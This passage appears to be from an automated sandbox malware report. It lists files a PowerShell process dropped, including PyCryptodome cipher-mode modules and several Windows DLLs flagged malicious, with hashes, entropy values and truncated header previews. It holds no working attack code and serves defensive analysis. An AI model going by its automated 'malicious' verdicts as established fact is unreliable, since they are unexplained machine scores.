                                                                                                                                                                                                            SHA-512:E347FD33F158E656F5F60499D25C18B7121896190B3F4CB935F3253433CFCB038E3B46D591E203F0EF78F8F99D91D76F2FF34D2831360D199AE0E1B148F0AC65
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ofb.py : OFB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):716
                                                                                                                                                                                                            Entropy (8bit):4.736539689518066
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYBw1+sJal9lvIY3FDXHo2JRyU1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT3pHo2NAY4nRNne3yFnR3FneM
                                                                                                                                                                                                            MD5:AFB364F0C9ADDDBA29076577257DFC52
                                                                                                                                                                                                            SHA1:208940A0B5304122118AD8E33CB8B8AF35228146
                                                                                                                                                                                                            SHA-256:C3F9CFE344BE5B88677256A584AC428D271A23B45E856A77165844787980B63F
                                                                                                                                                                                                            SHA-512:00A6D68651C4AE8D159E15F6617421322764CBE06307D9E454A96FBEE925F37BB567A2365416B9C2F4A1FE3AD03185750AB65B8B6BD08878446C8368508D45F8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OfbMode']....class OfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7259
                                                                                                                                                                                                            Entropy (8bit):4.832276328481339
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:9qrskrs9t3q/Itv4RK0tUU4cp/6U41k2T:0rskrs9Vq0J0tUTccT7
                                                                                                                                                                                                            MD5:A64ED188605DD3505B7F51513EC9397D
                                                                                                                                                                                                            SHA1:38198DDFB53F1C410999AC0622F27328F7EB3D85
                                                                                                                                                                                                            SHA-256:3F71E4528BD24F3CC96BDEA89BC1CAC2FE69FC198C4DB07BFD0A1C997827FAE4
                                                                                                                                                                                                            SHA-512:0559C532F2D2B5DF2994AA16C0204C2AC27283B5540530BD1F069BC46A4C1F6A5E8142976DF29AC112B7F24E49200EA2DCF7C0C3BB1E537B559E2D616D148732
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):576
                                                                                                                                                                                                            Entropy (8bit):4.621504702467695
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1Ro8s7REYB6IvIY3FDUCpu8RypqIY3fmIY3fm1Ap/ILFq6R5wnFq6R5j:1RM7C8T3SCpTB3632A9KnReFnRN
                                                                                                                                                                                                            MD5:C1EADE4DE0796F8C003DBB655E410274
                                                                                                                                                                                                            SHA1:283080AEFA8D7F00772CE108277688D55519EF46
                                                                                                                                                                                                            SHA-256:5E1521B1EA98D146374597A94FF5DF82FBE49F7C3DC06F6DB03379E1EA79D7E5
                                                                                                                                                                                                            SHA-512:3D2601FFBB3EC84FDEF28FBF4F409CBBF60D220B394D256FD13728EF5F0CC587FC2EDB00C868C10EEF7E0303508949D79DC23F3998E5CE2D4942A2A625BFC676
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OpenPgpMode']....class OpenPgpMode(object):.. block_size: int.. iv: Union[bytes, bytearray, memoryview].. IV: Union[bytes, bytearray, memoryview].. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. iv: Buffer,.. cipher_params: Dict) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: .......
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14369
                                                                                                                                                                                                            Entropy (8bit):4.787903135099736
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:9qrskrs9t3q/IK31IzSsGJ+KLk3eNVkrEPHAZsLzL64giVRWcuL4oozDTo0Bk+Y:0rskrs9Vqp1pXNVkrEPH6MXWiXWWtDUX
                                                                                                                                                                                                            MD5:ED410BD9244F81EE63DE5883EA85F821
                                                                                                                                                                                                            SHA1:2C04FA9C2F06F167CC5411C41A925F9E56337ABB
                                                                                                                                                                                                            SHA-256:BEB9B03EE0819457C449970767BC7FE3F671A385BED8B7C018BBD3EDD2F9C45D
                                                                                                                                                                                                            SHA-512:57081239F77B97D2EF811207B0F29518D9C44E216A529F59B17726B7E378853E0E771E2120C8EBC759A323A4AEED330E3DB3A291FE25F523AC5D782431003CD2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1299
                                                                                                                                                                                                            Entropy (8bit):4.379657025743841
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RM7ClDTglT3RzEA9unReFnR7PtWLn8no0E+XW3oIQ:cSklORuWLn8nlEF49
                                                                                                                                                                                                            MD5:FB584A8E53BC1B138B3932BDF16901D5
                                                                                                                                                                                                            SHA1:CF4F2426C15F17BD613A304B3E7F19A181E2035E
                                                                                                                                                                                                            SHA-256:80DAE2A187B04F2E3729BCDF78DE0DB31E22CA0922AD420F65077C448F1538E5
                                                                                                                                                                                                            SHA-512:05D214D0B39CA5566EA833772207D823AF350AEDDAF4A76C9569024D2A374D48FC48A0729B226A1A934E7CA179A5130ABB4232D3412BA27C9DA3DB214A9358BA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Tuple, Dict, Optional, overload....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['SivMode']....class SivMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. kwargs: Dict) -> None: ..... .. def update(self, component: Buffer) -> SivMode: ....... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ....... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer) -> Tuple[bytes, bytes]: ..... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer,..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                                            Entropy (8bit):5.562254057720826
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Ai7mktHPEqlvwLdhDwZjOQ/LAAEZjAPZgQ2atNMVnh8Nz:AiflYTDojj/LFQj1QUnhm
                                                                                                                                                                                                            MD5:B3B9B05521968E4345487BFEFDFBA211
                                                                                                                                                                                                            SHA1:03CAAA75D4148500AB59756E3B8F1BB342288EE9
                                                                                                                                                                                                            SHA-256:E891F6F6930BA0D8781AFAE3F7E6CCB74A7AA828B29A8E089615ABE61AB2AD96
                                                                                                                                                                                                            SHA-512:8631F84C72EC8F78D56AA80D85367BD60680C454549ADAFC90AA2E4BA693BA34A107A0A137681AF7E0490042418FC8145EA27B4CA8D3AB843C2E04610026561F
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R.Q.<.Q.<.Q.<.X..U.<...=.S.<...=.R.<.Q.=.r.<...9.Z.<...8.[.<...?.P.<..4.P.<..<.P.<....P.<..>.P.<.RichQ.<.................PE..L...\..f...........!................N........0...............................p............@..........................4......H5..d....P.......................`..h....0...............................0..@............0..|............................text............................... ..`.rdata.......0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc..h....`.......(..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1865
                                                                                                                                                                                                            Entropy (8bit):3.3643263236552166
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1+PdPq4/seQpoe/HMaDOP4PTpegUgygBVEp5KC:gPdF/szoG6+hBVEmC
                                                                                                                                                                                                            MD5:F93AE45150224E27A0198060D999FF3F
                                                                                                                                                                                                            SHA1:25CA8C5737157BED998870A4C5F2A53392FE4298
                                                                                                                                                                                                            SHA-256:9F8950FEEB6BE54C20FE83B79D18B33C773591E4BFD2F6ED85865E4E12677616
                                                                                                                                                                                                            SHA-512:CA4D755B859FBDDA17F5B498A2B6A718FCB452D3AD71715D84707B5D3EFFE383FCB1AD23E2CE34387ABD390825135C18AD2152B35AA23FD0717660AD63F4C1C3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from Crypto.Util._raw_api import (load_pycryptodome_raw_lib, c_size_t,.. c_uint8_ptr)......_raw_pkcs1_decode = load_pycryptodome_raw_lib("Crypto.Cipher._pkcs1_decode",.. """.. int pkcs1_decode(const uint8_t *em, size_t len_em,.. const uint8_t *sentinel, size_t len_sentinel,.. size_t expected_pt_len,.. uint8_t *output);.... int oaep_decode(const uint8_t *em,.. size_t em_len,.. const uint8_t *lHash,.. size_t hLen,.. const uint8_t *db,.. size_t db_len);.. """)......def pkcs1_decode(em, sentinel, expected_pt_len, output):.. if len(em) != len(output):..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30720
                                                                                                                                                                                                            Entropy (8bit):6.897898758009767
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:xPorzE44jpj5bWauyC7aUARtVCpeiO2KsIPKDkGuF0U3d0QOo8VdbKBWmutnb+sR:5g0bWauyUARtVn2K/S4j9d0th9VVb+E
                                                                                                                                                                                                            MD5:F72D3E634DD12DE2DB6D1669A264A6A8
                                                                                                                                                                                                            SHA1:392770A6901CE9E533D256760F011CF7A9249BA3
                                                                                                                                                                                                            SHA-256:15D0D1180358D5EDEABAC712B61F12C4646DA076A8F81D0A2C51E945ED1D2ABD
                                                                                                                                                                                                            SHA-512:634F7F54AB2CBCBEFF9FB9FB8A85733C5FE40E1297E0F53C5701A483BC794BB77E5104539230B92C715D1F3353143EE68B8196F8F80F6D54385543779644CE78
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X.Q.6.Q.6.Q.6.X..U.6...7.S.6...7.R.6.Q.7.p.6...3.Z.6...2.[.6...5.P.6..>.P.6..6.P.6....P.6..4.P.6.RichQ.6.................PE..L...Y..f...........!.....8...>......N........P............................................@..........................|......L}..d...............................t....x...............................y..@............P..t............................text....6.......8.................. ..`.rdata...0...P...2...<..............@..@.data................n..............@....rsrc................p..............@..@.reloc..t............r..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12800
                                                                                                                                                                                                            Entropy (8bit):5.699906516805595
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:ancNcRBIjYfsxI5VsdaZrI0IaEn6jYUz5:8FF6I80rML6jYUz
                                                                                                                                                                                                            MD5:5A7041358C98E0F7166BA15671353B4F
                                                                                                                                                                                                            SHA1:70611640D46159EF104D6FD2203B3892D754DDD5
                                                                                                                                                                                                            SHA-256:4D97D75925FF5AFAD48F88E9AF767F035E5EF29040BF0C8969FD797F340E91D0
                                                                                                                                                                                                            SHA-512:5096678A15585080020424F9593B5C88082115FD983EB07B75F3A5A106B44E7EE5FEC8DB5DC41A583F5CDDCE2214C6ECB0961FF17560B7B10E3D2954A1DFCF7B
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*.Q.D.Q.D.Q.D.X...U.D...E.S.D...E.R.D.Q.E.u.D...A.Z.D...@.[.D...G.P.D..L.P.D..D.P.D...P.D..F.P.D.RichQ.D.........................PE..L...Z..f...........!................N........0...............................p............@..........................4......T5..d....P.......................`.......0...............................0..@............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......,..............@....rsrc........P......................@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14848
                                                                                                                                                                                                            Entropy (8bit):6.076730626882705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:spl00PEzr4CVRLE4Yjui5jOqdNbShQuo6qIjSWALsT0krPhMP+Z0TqWiwWBdNIMV:sXic+LT8jt+JkQVITqRngm
                                                                                                                                                                                                            MD5:A7600FB64991AA108D1AB52EE2392E15
                                                                                                                                                                                                            SHA1:7708A1496E3C1BE863CFCA831CFDF7D69D557BE0
                                                                                                                                                                                                            SHA-256:8B8BFE0BAFAEDF5F08FEC5F99C3EB41211816E8C2FA8545A20314C0A3623D761
                                                                                                                                                                                                            SHA-512:3801931CF9B563B9517712839C06E145EE7FD7362A8AD8306F3DC6593D3696E79BD3BF7134DDBAD42F4CEC5BB6855E4C1410417D5A5D0504D298C6B18F6FE857
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V.Q.8.Q.8.Q.8.X..U.8...9.S.8...9.R.8.Q.9.s.8...=.Z.8...<.[.8...;.P.8..0.P.8..8.P.8....P.8..:.P.8.RichQ.8.........................PE..L...Z..f...........!.....&..........N........@............................................@..........................E......PF..d....`.......................p..h....A...............................A..@............@..x............................text....%.......&.................. ..`.rdata.......@.......*..............@..@.data........P.......4..............@....rsrc........`.......6..............@..@.reloc..h....p.......8..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15872
                                                                                                                                                                                                            Entropy (8bit):6.479252838196804
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:sOScXjTsjXYevMter6MVpJgLa0Mp8A3ngu:1tvGYmMtk6M9gLa1DXgu
                                                                                                                                                                                                            MD5:34FCA4C749A6B7BD5967E96ECB42F18F
                                                                                                                                                                                                            SHA1:8ED04AA18A9EDDDDEF4154BD62E94057BC7D04F0
                                                                                                                                                                                                            SHA-256:AA907E37728D159F4ECC69D4276DAE0A7703E87248B55BAD72BB6E8FD01996B6
                                                                                                                                                                                                            SHA-512:BF85DFBB0A2D2E961E7F9C50ACB7CC33A802D0EAED6368A4BFB252EE3D55DEF4A6D5DC88F28CF0490E7C731E8A39A94D7F241FA4F0CAD9D3F038763A7C0C0131
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V.Q.8.Q.8.Q.8.X..U.8...9.S.8...9.R.8.Q.9.s.8...=.Z.8...<.[.8...;.P.8..0.P.8..8.P.8....P.8..:.P.8.RichQ.8.........................PE..L...Z..f...........!........."......N........0............................................@..........................E.......E..d....`.......................p.......@...............................A..@............0..x............................text...#........................... ..`.rdata.......0......................@..@.data........P.......8..............@....rsrc........`.......:..............@..@.reloc.......p.......<..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):22016
                                                                                                                                                                                                            Entropy (8bit):6.895160006706223
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:sL1BYgIjebZgPv67ZXmrfXA+UA10ol31tuXGmngO:YIGWKXmrXA+NNxWTgO
                                                                                                                                                                                                            MD5:BF4F8AFCD8A6A362C58BA7E2B9AA8ED8
                                                                                                                                                                                                            SHA1:8BF3FF6573B2B7F8BE494BD3F72B7002490E1A4C
                                                                                                                                                                                                            SHA-256:01422F138544D22BEA3BF55E622274AF0600AE82CAD47BFEFFFDC23CD96CE666
                                                                                                                                                                                                            SHA-512:1DC96BDCC1BA39FBE808E9E7A6E87B8CF9825034991388A0775373296D7CA1E766C9C659E12711C9861FAD23E39FFA8CB29F28FD0FDF0DD829402E4CC1D99862
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V.Q.8.Q.8.Q.8.X..U.8...9.S.8...9.R.8.Q.9.s.8...=.Z.8...<.[.8...;.P.8..0.P.8..8.P.8....P.8..:.P.8.RichQ.8.........................PE..L...Z..f...........!..... ...4......K........0............................................@..........................T......PU..d....p...............................P...............................P..@............0..x............................text............ .................. ..`.rdata...(...0...*...$..............@..@.data........`.......N..............@....rsrc........p.......P..............@..@.reloc...............R..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9728
                                                                                                                                                                                                            Entropy (8bit):5.05673823517938
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:sG94VPErNKELE6ImKVhkcE/xgujOSSQLAC9uA7kMaPmMmGffzcATXdr:sG4VPEXvInVhTQWujOS5LRbMVnAINr
                                                                                                                                                                                                            MD5:D372A4EEC83AB1384C242EDEA93E58BB
                                                                                                                                                                                                            SHA1:51265EDDB22890D6069A70AACA8CE6C8F0733B49
                                                                                                                                                                                                            SHA-256:B5C57F458DCE223ECC6ECA92CDC438F89D80936C1FD28F3DED3C34E7B5B9C808
                                                                                                                                                                                                            SHA-512:09535302FD60193DD965B01D7E6119788215AC062406D1F09969C9D8AA751C8823D8478A5CB9A10D62212DD82CE84EDA138F9A1F3FFA42D1C3FAA093EB891A2D
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V.Q.8.Q.8.Q.8.X..U.8...9.S.8...9.R.8.Q.9.s.8...=.Z.8...<.[.8...;.P.8..0.P.8..8.P.8....P.8..:.P.8.RichQ.8.........................PE..L...]..f...........!................N........0...............................p............@..........................4......x5..d....P.......................`..T....0...............................0..@............0..x............................text...)........................... ..`.rdata.......0......................@..@.data........@....... ..............@....rsrc........P......."..............@..@.reloc..T....`.......$..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                            Entropy (8bit):5.545848981942874
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:assDkPEITpjahh0sX4jO0Wfx0JYQOnLMVnk+HZN:a3GdghbojNZAKnk+HD
                                                                                                                                                                                                            MD5:75D76DF25C45ABF5E5AFF19DF6E519EE
                                                                                                                                                                                                            SHA1:BEC2FB0FA9103F5F00A96C171E6CC22F30C67423
                                                                                                                                                                                                            SHA-256:D7AF81A9F1BE932339D8F38978C6A89DDEB279D75CF22F18D664EC6E605ADBA9
                                                                                                                                                                                                            SHA-512:80B85386F39364FEF3F088D0711FC24A480363F859B88A62E1E81346B9951B78B15D32B0AA5E6F86FCA080F559DCAC108197B242C8DEB7C33D8302B83E991749
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*.Q.D.Q.D.Q.D.X...U.D...E.S.D...E.R.D.Q.E.u.D...A.Z.D...@.[.D...G.P.D..L.P.D..D.P.D...P.D..F.P.D.RichQ.D.........................PE..L...]..f...........!................N........0...............................p............@..........................4......x5..d....P.......................`..p....0...............................0..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@......."..............@....rsrc........P.......$..............@..@.reloc..p....`.......&..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11776
                                                                                                                                                                                                            Entropy (8bit):5.529189405394336
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:qMjc9PEd4XgTwhjERjOHBxYb0xkaZG2ao/FfxMVnpF1K+TN:qMb4wWjcj2Ba03E2aoR4npF0y
                                                                                                                                                                                                            MD5:B792871F15B2539A0C4836247FDE0412
                                                                                                                                                                                                            SHA1:31E57808630B6985757595939E48BF8C55A2DE3E
                                                                                                                                                                                                            SHA-256:6212CA9152BF469CB33EB258ACDC2E98E2B426ED8F9BAAA9361BC7BED842B98F
                                                                                                                                                                                                            SHA-512:10057D6B08E26E052E420D1A8D0B3F96CCC75170394420120135541E5901404CC4FB04415850077DB80A85DDF74BEC8E0462CE2F41DDF66C3A3A8A7A0291893C
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5...[...[...[......[..Z...[..Z...[...Z..[..^...[.._...[..X...[.?.S...[.?.[...[.?....[.?.Y...[.Rich..[.................PE..L...^..f...........!................N........0...............................p............@..........................4......x5..d....P.......................`..t....0...............................0..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......(..............@....rsrc........P.......*..............@..@.reloc..t....`.......,..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):52736
                                                                                                                                                                                                            Entropy (8bit):4.0628817852139365
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Nv2BTcKRIjAl8PKPSMgMkLVeL3LFuLPL1+L8SlOLTVeLcy2LT4z76mrZb0nbo42:Nv2VcVPKcDq7KjqzKTqzQT4zupbon
                                                                                                                                                                                                            MD5:8CC67C8C6EB0800F13EE977F570BB629
                                                                                                                                                                                                            SHA1:FA27F7C49B45F01227F41C6547A4F6026073A043
                                                                                                                                                                                                            SHA-256:B62595EAEE35110E002DD5F9BE8E4AA5A41F78EB219D65D7FC870869B29F8E36
                                                                                                                                                                                                            SHA-512:CFA86CD480314E7E6540F93C38986868663956C6951B1B694FC62D888B59E5CFE6C72D12B1AC20FB2AA44F19F2E81AD5901E3CBFCEFD87070E64E7997317DA15
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........S...=...=...=.....=..<...=..<...=...<..=..8...=..9...=..>...=.?.5...=.?.=...=.?.....=.?.?...=.Rich..=.................PE..L...[..f...........!.....,..........K........@............................................@.........................@...........d...................................0...............................P...@............@..t............................text...++.......,.................. ..`.rdata..&....@.......0..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):53248
                                                                                                                                                                                                            Entropy (8bit):4.078368059832545
                                                                                                                                                                                                            Encrypted:false
